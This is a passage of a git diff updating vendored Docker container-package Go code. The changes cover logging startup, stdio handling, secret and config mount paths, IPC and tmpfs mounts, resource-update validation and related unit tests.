nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) - var portStart, portEnd int - if err == nil { - portStart, portEnd, err = newP.Range() - 
} - if err != nil { - return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) - } - pbCopy.HostPort = uint16(portStart) - pbCopy.HostPortEnd = uint16(portEnd) - pbCopy.HostIP = net.ParseIP(binding[i].HostIP) - pbList = append(pbList, pbCopy) - } - - if container.HostConfig.PublishAllPorts && len(binding) == 0 { - pbList = append(pbList, pb) - } - } - - var dns []string - - if len(container.HostConfig.DNS) > 0 { - dns = container.HostConfig.DNS - } else if len(daemonDNS) > 0 { - dns = daemonDNS - } - - if len(dns) > 0 { - createOptions = append(createOptions, - libnetwork.CreateOptionDNS(dns)) - } - - createOptions = append(createOptions, - libnetwork.CreateOptionPortMapping(pbList), - libnetwork.CreateOptionExposedPorts(exposeList)) - - return createOptions, nil -} - // UpdateMonitor updates monitor configure for running container func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) { type policySetter interface { @@ -1044,9 +595,9 @@ func (container *Container) startLogging() error { return nil // do not start logging routines } - l, err := container.StartLogger(container.HostConfig.LogConfig) + l, err := container.StartLogger() if err != nil { - return fmt.Errorf("Failed to initialize logging driver: %v", err) + return fmt.Errorf("failed to initialize logging driver: %v", err) } copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l) @@ -1054,11 +605,6 @@ func (container *Container) startLogging() error { copier.Run() container.LogDriver = l - // set LogPath field only for json-file logdriver - if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok { - container.LogPath = jl.LogPath() - } - return nil } @@ -1083,10 +629,10 @@ func (container *Container) CloseStreams() error { } // InitializeStdio is called by libcontainerd to connect the stdio. 
-func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { +func (container *Container) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) { if err := container.startLogging(); err != nil { container.Reset(false) - return err + return nil, err } container.StreamConfig.CopyToPipe(iop) @@ -1099,5 +645,76 @@ func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { } } - return nil + return &rio{IO: iop, sc: container.StreamConfig}, nil +} + +// MountsResourcePath returns the path where mounts are stored for the given mount +func (container *Container) MountsResourcePath(mount string) (string, error) { + return container.GetRootResourcePath(filepath.Join("mounts", mount)) +} + +// SecretMountPath returns the path of the secret mount for the container +func (container *Container) SecretMountPath() (string, error) { + return container.MountsResourcePath("secrets") +} + +// SecretFilePath returns the path to the location of a secret on the host. +func (container *Container) SecretFilePath(secretRef swarmtypes.SecretReference) (string, error) { + secrets, err := container.SecretMountPath() + if err != nil { + return "", err + } + return filepath.Join(secrets, secretRef.SecretID), nil +} + +func getSecretTargetPath(r *swarmtypes.SecretReference) string { + if filepath.IsAbs(r.File.Name) { + return r.File.Name + } + + return filepath.Join(containerSecretMountPath, r.File.Name) +} + +// CreateDaemonEnvironment creates a new environment variable slice for this container. +func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { + // Setup environment + os := container.OS + if os == "" { + os = runtime.GOOS + } + env := []string{} + if runtime.GOOS != "windows" || (runtime.GOOS == "windows" && os == "linux") { + env = []string{ + "PATH=" + system.DefaultPathEnv(os), + "HOSTNAME=" + container.Config.Hostname, + } + if tty { + env = append(env, "TERM=xterm") + } + env = append(env, linkedEnv...) 
+ } + + // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + env = ReplaceOrAppendEnvValues(env, container.Config.Env) + return env +} + +type rio struct { + cio.IO + + sc *stream.Config +} + +func (i *rio) Close() error { + i.IO.Close() + + return i.sc.CloseStreams() +} + +func (i *rio) Wait() { + i.sc.Wait() + + i.IO.Wait() } diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go deleted file mode 100644 index 4d4c16b563..0000000000 --- a/vendor/github.com/docker/docker/container/container_linux.go +++ /dev/null @@ -1,9 +0,0 @@ -package container - -import ( - "golang.org/x/sys/unix" -) - -func detachMounted(path string) error { - return unix.Unmount(path, unix.MNT_DETACH) -} diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go deleted file mode 100644 index f65653e992..0000000000 --- a/vendor/github.com/docker/docker/container/container_notlinux.go +++ /dev/null @@ -1,23 +0,0 @@ -// +build solaris freebsd - -package container - -import ( - "golang.org/x/sys/unix" -) - -func detachMounted(path string) error { - //Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature. - // Therefore there are separate definitions for this. 
- return unix.Unmount(path, 0) -} - -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { - return nil -} - -// UnmountSecrets unmounts the fs for secrets -func (container *Container) UnmountSecrets() error { - return nil -} diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go index f301f25bbe..82b5864760 100644 --- a/vendor/github.com/docker/docker/container/container_unit_test.go +++ b/vendor/github.com/docker/docker/container/container_unit_test.go @@ -1,17 +1,22 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" "testing" "github.com/docker/docker/api/types/container" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/logger/jsonfilelog" "github.com/docker/docker/pkg/signal" + "gotest.tools/assert" ) func TestContainerStopSignal(t *testing.T) { c := &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{}, - }, + Config: &container.Config{}, } def, err := signal.ParseSignal(signal.DefaultStopSignal) @@ -25,9 +30,7 @@ func TestContainerStopSignal(t *testing.T) { } c = &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{StopSignal: "SIGKILL"}, - }, + Config: &container.Config{StopSignal: "SIGKILL"}, } s = c.StopSignal() if s != 9 { @@ -37,9 +40,7 @@ func TestContainerStopSignal(t *testing.T) { func TestContainerStopTimeout(t *testing.T) { c := &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{}, - }, + Config: &container.Config{}, } s := c.StopTimeout() @@ -49,12 +50,77 @@ func TestContainerStopTimeout(t *testing.T) { stopTimeout := 15 c = &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{StopTimeout: &stopTimeout}, + Config: &container.Config{StopTimeout: &stopTimeout}, + } + s = c.StopTimeout() 
+ if s != stopTimeout { + t.Fatalf("Expected %v, got %v", stopTimeout, s) + } +} + +func TestContainerSecretReferenceDestTarget(t *testing.T) { + ref := &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "app", }, } - s = c.StopSignal() - if s != 15 { - t.Fatalf("Expected 15, got %v", s) + + d := getSecretTargetPath(ref) + expected := filepath.Join(containerSecretMountPath, "app") + if d != expected { + t.Fatalf("expected secret dest %q; received %q", expected, d) } } + +func TestContainerLogPathSetForJSONFileLogger(t *testing.T) { + containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForJSONFileLogger") + assert.NilError(t, err) + defer os.RemoveAll(containerRoot) + + c := &Container{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + LogConfig: container.LogConfig{ + Type: jsonfilelog.Name, + }, + }, + ID: "TestContainerLogPathSetForJSONFileLogger", + Root: containerRoot, + } + + logger, err := c.StartLogger() + assert.NilError(t, err) + defer logger.Close() + + expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID))) + assert.NilError(t, err) + assert.Equal(t, c.LogPath, expectedLogPath) +} + +func TestContainerLogPathSetForRingLogger(t *testing.T) { + containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForRingLogger") + assert.NilError(t, err) + defer os.RemoveAll(containerRoot) + + c := &Container{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + LogConfig: container.LogConfig{ + Type: jsonfilelog.Name, + Config: map[string]string{ + "mode": string(container.LogModeNonBlock), + }, + }, + }, + ID: "TestContainerLogPathSetForRingLogger", + Root: containerRoot, + } + + logger, err := c.StartLogger() + assert.NilError(t, err) + defer logger.Close() + + expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID))) + assert.NilError(t, err) + assert.Equal(t, c.LogPath, expectedLogPath) 
+} diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go index 4f6b795d2c..ed664f3eec 100644 --- a/vendor/github.com/docker/docker/container/container_unix.go +++ b/vendor/github.com/docker/docker/container/container_unix.go @@ -1,77 +1,34 @@ -// +build linux freebsd solaris +// +build !windows -package container +package container // import "github.com/docker/docker/container" import ( - "fmt" "io/ioutil" "os" "path/filepath" - "strings" - "github.com/Sirupsen/logrus" + "github.com/containerd/continuity/fs" + "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/chrootarchive" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/system" - "github.com/docker/docker/utils" "github.com/docker/docker/volume" - "github.com/opencontainers/runc/libcontainer/label" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "golang.org/x/sys/unix" ) const ( - // DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container - DefaultSHMSize int64 = 67108864 - containerSecretMountPath = "/run/secrets" -) - -// Container holds the fields specific to unixen implementations. -// See CommonContainer for standard fields common to all containers. -type Container struct { - CommonContainer - - // Fields below here are platform specific. - AppArmorProfile string - HostnamePath string - HostsPath string - ShmPath string - ResolvConfPath string - SeccompProfile string - NoNewPrivileges bool -} - -// ExitStatus provides exit reasons for a container. 
-type ExitStatus struct { - // The exit code with which the container exited. - ExitCode int - - // Whether the container encountered an OOM. - OOMKilled bool -} + // DefaultStopTimeout sets the default time, in seconds, to wait + // for the graceful container stop before forcefully terminating it. + DefaultStopTimeout = 10 -// CreateDaemonEnvironment returns the list of all environment variables given the list of -// environment variables related to links. -// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM. -// The defaults set here do not override the values in container.Config.Env -func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { - // Setup environment - env := []string{ - "PATH=" + system.DefaultPathEnv, - "HOSTNAME=" + container.Config.Hostname, - } - if tty { - env = append(env, "TERM=xterm") - } - env = append(env, linkedEnv...) - // because the env on the container can override certain default values - // we need to replace the 'env' keys where they match and append anything - // else. 
- env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env) - return env -} + containerSecretMountPath = "/run/secrets" +) // TrySetNetworkMount attempts to set the network mounts given a provided destination and // the path to use for it; return true if the given destination was a network mount file @@ -106,22 +63,22 @@ func (container *Container) BuildHostnameFile() error { func (container *Container) NetworkMounts() []Mount { var mounts []Mount shared := container.HostConfig.NetworkMode.IsContainer() + parser := volumemounts.NewParser(container.OS) if container.ResolvConfPath != "" { if _, err := os.Stat(container.ResolvConfPath); err != nil { logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err) } else { - if !container.HasMountFor("/etc/resolv.conf") { - label.Relabel(container.ResolvConfPath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/resolv.conf"]; exists { writable = m.RW + } else { + label.Relabel(container.ResolvConfPath, container.MountLabel, shared) } mounts = append(mounts, Mount{ Source: container.ResolvConfPath, Destination: "/etc/resolv.conf", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } @@ -129,18 +86,17 @@ func (container *Container) NetworkMounts() []Mount { if _, err := os.Stat(container.HostnamePath); err != nil { logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err) } else { - if !container.HasMountFor("/etc/hostname") { - label.Relabel(container.HostnamePath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/hostname"]; exists { writable = m.RW + } else { + label.Relabel(container.HostnamePath, container.MountLabel, shared) } mounts = append(mounts, Mount{ 
Source: container.HostnamePath, Destination: "/etc/hostname", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } @@ -148,37 +104,31 @@ func (container *Container) NetworkMounts() []Mount { if _, err := os.Stat(container.HostsPath); err != nil { logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err) } else { - if !container.HasMountFor("/etc/hosts") { - label.Relabel(container.HostsPath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/hosts"]; exists { writable = m.RW + } else { + label.Relabel(container.HostsPath, container.MountLabel, shared) } mounts = append(mounts, Mount{ Source: container.HostsPath, Destination: "/etc/hosts", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } return mounts } -// SecretMountPath returns the path of the secret mount for the container -func (container *Container) SecretMountPath() string { - return filepath.Join(container.Root, "secrets") -} - // CopyImagePathContent copies files in destination to the volume. 
func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error { - rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS) + rootfs, err := container.GetResourcePath(destination) if err != nil { return err } - if _, err = ioutil.ReadDir(rootfs); err != nil { + if _, err := os.Stat(rootfs); err != nil { if os.IsNotExist(err) { return nil } @@ -204,97 +154,160 @@ func (container *Container) CopyImagePathContent(v volume.Volume, destination st // ShmResourcePath returns path to shm func (container *Container) ShmResourcePath() (string, error) { - return container.GetRootResourcePath("shm") + return container.MountsResourcePath("shm") } // HasMountFor checks if path is a mountpoint func (container *Container) HasMountFor(path string) bool { _, exists := container.MountPoints[path] - return exists -} - -// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted -func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { - if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() { - return + if exists { + return true } - var warnings []string + // Also search among the tmpfs mounts + for dest := range container.HostConfig.Tmpfs { + if dest == path { + return true + } + } - if !container.HasMountFor("/dev/shm") { - shmPath, err := container.ShmResourcePath() - if err != nil { - logrus.Error(err) - warnings = append(warnings, err.Error()) - } else if shmPath != "" { - if err := unmount(shmPath); err != nil && !os.IsNotExist(err) { - warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err)) - } + return false +} - } +// UnmountIpcMount uses the provided unmount function to unmount shm if it was mounted +func (container *Container) UnmountIpcMount(unmount func(pth string) error) error { + if container.HasMountFor("/dev/shm") { + return nil } - if len(warnings) > 0 { - 
logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n")) + // container.ShmPath should not be used here as it may point + // to the host's or other container's /dev/shm + shmPath, err := container.ShmResourcePath() + if err != nil { + return err + } + if shmPath == "" { + return nil + } + if err = unmount(shmPath); err != nil && !os.IsNotExist(err) { + if mounted, mErr := mount.Mounted(shmPath); mounted || mErr != nil { + return errors.Wrapf(err, "umount %s", shmPath) + } } + return nil } // IpcMounts returns the list of IPC mounts func (container *Container) IpcMounts() []Mount { var mounts []Mount + parser := volumemounts.NewParser(container.OS) - if !container.HasMountFor("/dev/shm") { - label.SetFileLabel(container.ShmPath, container.MountLabel) - mounts = append(mounts, Mount{ - Source: container.ShmPath, - Destination: "/dev/shm", - Writable: true, - Propagation: string(volume.DefaultPropagationMode), - }) + if container.HasMountFor("/dev/shm") { + return mounts + } + if container.ShmPath == "" { + return mounts } + label.SetFileLabel(container.ShmPath, container.MountLabel) + mounts = append(mounts, Mount{ + Source: container.ShmPath, + Destination: "/dev/shm", + Writable: true, + Propagation: string(parser.DefaultPropagationMode()), + }) + return mounts } -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { - if len(container.SecretReferences) > 0 { - return &Mount{ - Source: container.SecretMountPath(), - Destination: containerSecretMountPath, +// SecretMounts returns the mounts for the secret path. 
+func (container *Container) SecretMounts() ([]Mount, error) { + var mounts []Mount + for _, r := range container.SecretReferences { + if r.File == nil { + continue + } + src, err := container.SecretFilePath(*r) + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: src, + Destination: getSecretTargetPath(r), Writable: false, + }) + } + for _, r := range container.ConfigReferences { + fPath, err := container.ConfigFilePath(*r) + if err != nil { + return nil, err } + mounts = append(mounts, Mount{ + Source: fPath, + Destination: r.File.Name, + Writable: false, + }) } - return nil + return mounts, nil } // UnmountSecrets unmounts the local tmpfs for secrets func (container *Container) UnmountSecrets() error { - if _, err := os.Stat(container.SecretMountPath()); err != nil { + p, err := container.SecretMountPath() + if err != nil { + return err + } + if _, err := os.Stat(p); err != nil { if os.IsNotExist(err) { return nil } return err } - return detachMounted(container.SecretMountPath()) + return mount.RecursiveUnmount(p) } -// UpdateContainer updates configuration of a container. -func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { - container.Lock() - defer container.Unlock() +type conflictingUpdateOptions string + +func (e conflictingUpdateOptions) Error() string { + return string(e) +} + +func (e conflictingUpdateOptions) Conflict() {} +// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container. +func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { // update resources of container resources := hostConfig.Resources cResources := &container.HostConfig.Resources + + // validate NanoCPUs, CPUPeriod, and CPUQuota + // Because NanoCPU effectively updates CPUPeriod/CPUQuota, + // once NanoCPU is already set, updating CPUPeriod/CPUQuota will be blocked, and vice versa. 
+ // In the following we make sure the intended update (resources) does not conflict with the existing (cResource). + if resources.NanoCPUs > 0 && cResources.CPUPeriod > 0 { + return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Period has already been set") + } + if resources.NanoCPUs > 0 && cResources.CPUQuota > 0 { + return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Quota has already been set") + } + if resources.CPUPeriod > 0 && cResources.NanoCPUs > 0 { + return conflictingUpdateOptions("Conflicting options: CPU Period cannot be updated as NanoCPUs has already been set") + } + if resources.CPUQuota > 0 && cResources.NanoCPUs > 0 { + return conflictingUpdateOptions("Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set") + } + if resources.BlkioWeight != 0 { cResources.BlkioWeight = resources.BlkioWeight } if resources.CPUShares != 0 { cResources.CPUShares = resources.CPUShares } + if resources.NanoCPUs != 0 { + cResources.NanoCPUs = resources.NanoCPUs + } if resources.CPUPeriod != 0 { cResources.CPUPeriod = resources.CPUPeriod } @@ -311,7 +324,7 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi // if memory limit smaller than already set memoryswap limit and doesn't // update the memoryswap limit, then error out. 
if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 { - return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") + return conflictingUpdateOptions("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") } cResources.Memory = resources.Memory } @@ -324,20 +337,21 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi if resources.KernelMemory != 0 { cResources.KernelMemory = resources.KernelMemory } + if resources.CPURealtimePeriod != 0 { + cResources.CPURealtimePeriod = resources.CPURealtimePeriod + } + if resources.CPURealtimeRuntime != 0 { + cResources.CPURealtimeRuntime = resources.CPURealtimeRuntime + } // update HostConfig of container if hostConfig.RestartPolicy.Name != "" { if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + return conflictingUpdateOptions("Restart policy cannot be updated because AutoRemove is enabled for the container") } container.HostConfig.RestartPolicy = hostConfig.RestartPolicy } - if err := container.ToDisk(); err != nil { - logrus.Errorf("Error saving updated container: %v", err) - return err - } - return nil } @@ -367,7 +381,7 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st } for _, mountPath := range mountPaths { - if err := detachMounted(mountPath); err != nil { + if err := mount.Unmount(mountPath); err != nil { logrus.Warnf("%s unmountVolumes: Failed to do lazy umount fo volume '%s': %v", container.ID, mountPath, err) } } @@ -377,42 +391,20 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st // copyExistingContents copies from the source to the destination and // ensures the ownership is appropriately set. 
func copyExistingContents(source, destination string) error { - volList, err := ioutil.ReadDir(source) - if err != nil { - return err - } - if len(volList) > 0 { - srcList, err := ioutil.ReadDir(destination) - if err != nil { - return err - } - if len(srcList) == 0 { - // If the source volume is empty, copies files from the root into the volume - if err := chrootarchive.CopyWithTar(source, destination); err != nil { - return err - } - } - } - return copyOwnership(source, destination) -} - -// copyOwnership copies the permissions and uid:gid of the source file -// to the destination file -func copyOwnership(source, destination string) error { - stat, err := system.Stat(source) + dstList, err := ioutil.ReadDir(destination) if err != nil { return err } - - if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil { - return err + if len(dstList) != 0 { + // destination is not empty, do not copy + return nil } - - return os.Chmod(destination, os.FileMode(stat.Mode())) + return fs.CopyDir(destination, source) } // TmpfsMounts returns the list of tmpfs mounts func (container *Container) TmpfsMounts() ([]Mount, error) { + parser := volumemounts.NewParser(container.OS) var mounts []Mount for dest, data := range container.HostConfig.Tmpfs { mounts = append(mounts, Mount{ @@ -423,7 +415,7 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { } for dest, mnt := range container.MountPoints { if mnt.Type == mounttypes.TypeTmpfs { - data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) + data, err := parser.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) if err != nil { return nil, err } @@ -437,12 +429,35 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { return mounts, nil } -// cleanResourcePath cleans a resource path and prepares to combine with mnt path -func cleanResourcePath(path string) string { - return filepath.Join(string(os.PathSeparator), path) -} - // 
EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { return false } + +// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock. +func (container *Container) GetMountPoints() []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + Mode: m.Mode, + RW: m.RW, + Propagation: m.Propagation, + }) + } + return mountPoints +} + +// ConfigFilePath returns the path to the on-disk location of a config. +// On unix, configs are always considered secret +func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) (string, error) { + mounts, err := container.SecretMountPath() + if err != nil { + return "", err + } + return filepath.Join(mounts, configRef.ConfigID), nil +} diff --git a/vendor/github.com/docker/docker/container/container_windows.go b/vendor/github.com/docker/docker/container/container_windows.go index 1025836f1f..b5bdb5bc34 100644 --- a/vendor/github.com/docker/docker/container/container_windows.go +++ b/vendor/github.com/docker/docker/container/container_windows.go @@ -1,41 +1,29 @@ -// +build windows - -package container +package container // import "github.com/docker/docker/container" import ( "fmt" "os" "path/filepath" + "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/utils" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/system" ) -// Container holds fields specific to the Windows implementation. See -// CommonContainer for standard fields common to all containers. 
-type Container struct { - CommonContainer - - // Fields below here are platform specific. -} - -// ExitStatus provides exit reasons for a container. -type ExitStatus struct { - // The exit code with which the container exited. - ExitCode int -} +const ( + containerSecretMountPath = `C:\ProgramData\Docker\secrets` + containerInternalSecretMountPath = `C:\ProgramData\Docker\internal\secrets` + containerInternalConfigsDirPath = `C:\ProgramData\Docker\internal\configs` -// CreateDaemonEnvironment creates a new environment variable slice for this container. -func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string { - // because the env on the container can override certain default values - // we need to replace the 'env' keys where they match and append anything - // else. - return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env) -} + // DefaultStopTimeout is the timeout (in seconds) for the shutdown call on a container + DefaultStopTimeout = 30 +) -// UnmountIpcMounts unmounts Ipc related mounts. +// UnmountIpcMount unmounts Ipc related mounts. // This is a NOOP on windows. -func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { +func (container *Container) UnmountIpcMount(unmount func(pth string) error) error { + return nil } // IpcMounts returns the list of Ipc related mounts. @@ -43,16 +31,94 @@ func (container *Container) IpcMounts() []Mount { return nil } -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { +// CreateSecretSymlinks creates symlinks to files in the secret mount. 
+func (container *Container) CreateSecretSymlinks() error { + for _, r := range container.SecretReferences { + if r.File == nil { + continue + } + resolvedPath, _, err := container.ResolvePath(getSecretTargetPath(r)) + if err != nil { + return err + } + if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil { + return err + } + if err := os.Symlink(filepath.Join(containerInternalSecretMountPath, r.SecretID), resolvedPath); err != nil { + return err + } + } + return nil } +// SecretMounts returns the mount for the secret path. +// All secrets are stored in a single mount on Windows. Target symlinks are +// created for each secret, pointing to the files in this mount. +func (container *Container) SecretMounts() ([]Mount, error) { + var mounts []Mount + if len(container.SecretReferences) > 0 { + src, err := container.SecretMountPath() + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: src, + Destination: containerInternalSecretMountPath, + Writable: false, + }) + } + + return mounts, nil +} + // UnmountSecrets unmounts the fs for secrets func (container *Container) UnmountSecrets() error { + p, err := container.SecretMountPath() + if err != nil { + return err + } + return os.RemoveAll(p) +} + +// CreateConfigSymlinks creates symlinks to files in the config mount. +func (container *Container) CreateConfigSymlinks() error { + for _, configRef := range container.ConfigReferences { + if configRef.File == nil { + continue + } + resolvedPath, _, err := container.ResolvePath(configRef.File.Name) + if err != nil { + return err + } + if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil { + return err + } + if err := os.Symlink(filepath.Join(containerInternalConfigsDirPath, configRef.ConfigID), resolvedPath); err != nil { + return err + } + } + return nil } +// ConfigMounts returns the mount for configs. 
+// TODO: Right now Windows doesn't really have a "secure" storage for secrets, +// however some configs may contain secrets. Once secure storage is worked out, +// configs and secret handling should be merged. +func (container *Container) ConfigMounts() []Mount { + var mounts []Mount + if len(container.ConfigReferences) > 0 { + mounts = append(mounts, Mount{ + Source: container.ConfigsDirPath(), + Destination: containerInternalConfigsDirPath, + Writable: false, + }) + } + + return mounts +} + // DetachAndUnmount unmounts all volumes. // On Windows it only delegates to `UnmountVolumes` since there is nothing to // force unmount. @@ -66,17 +132,40 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { return mounts, nil } -// UpdateContainer updates configuration of a container +// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container. func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { - container.Lock() - defer container.Unlock() resources := hostConfig.Resources - if resources.BlkioWeight != 0 || resources.CPUShares != 0 || - resources.CPUPeriod != 0 || resources.CPUQuota != 0 || - resources.CpusetCpus != "" || resources.CpusetMems != "" || - resources.Memory != 0 || resources.MemorySwap != 0 || - resources.MemoryReservation != 0 || resources.KernelMemory != 0 { - return fmt.Errorf("Resource updating isn't supported on Windows") + if resources.CPUShares != 0 || + resources.Memory != 0 || + resources.NanoCPUs != 0 || + resources.CgroupParent != "" || + resources.BlkioWeight != 0 || + len(resources.BlkioWeightDevice) != 0 || + len(resources.BlkioDeviceReadBps) != 0 || + len(resources.BlkioDeviceWriteBps) != 0 || + len(resources.BlkioDeviceReadIOps) != 0 || + len(resources.BlkioDeviceWriteIOps) != 0 || + resources.CPUPeriod != 0 || + resources.CPUQuota != 0 || + resources.CPURealtimePeriod != 0 || + resources.CPURealtimeRuntime != 0 || + resources.CpusetCpus != "" || + 
resources.CpusetMems != "" || + len(resources.Devices) != 0 || + len(resources.DeviceCgroupRules) != 0 || + resources.DiskQuota != 0 || + resources.KernelMemory != 0 || + resources.MemoryReservation != 0 || + resources.MemorySwap != 0 || + resources.MemorySwappiness != nil || + resources.OomKillDisable != nil || + resources.PidsLimit != 0 || + len(resources.Ulimits) != 0 || + resources.CPUCount != 0 || + resources.CPUPercent != 0 || + resources.IOMaximumIOps != 0 || + resources.IOMaximumBandwidth != 0 { + return fmt.Errorf("resource updating isn't supported on Windows") } // update HostConfig of container if hostConfig.RestartPolicy.Name != "" { @@ -88,18 +177,6 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi return nil } -// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares -// to combine with a volume path -func cleanResourcePath(path string) string { - if len(path) >= 2 { - c := path[0] - if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { - path = path[2:] - } - } - return filepath.Join(string(os.PathSeparator), path) -} - // BuildHostnameFile writes the container's hostname file. func (container *Container) BuildHostnameFile() error { return nil @@ -109,3 +186,28 @@ func (container *Container) BuildHostnameFile() error { func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { return true } + +// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock. 
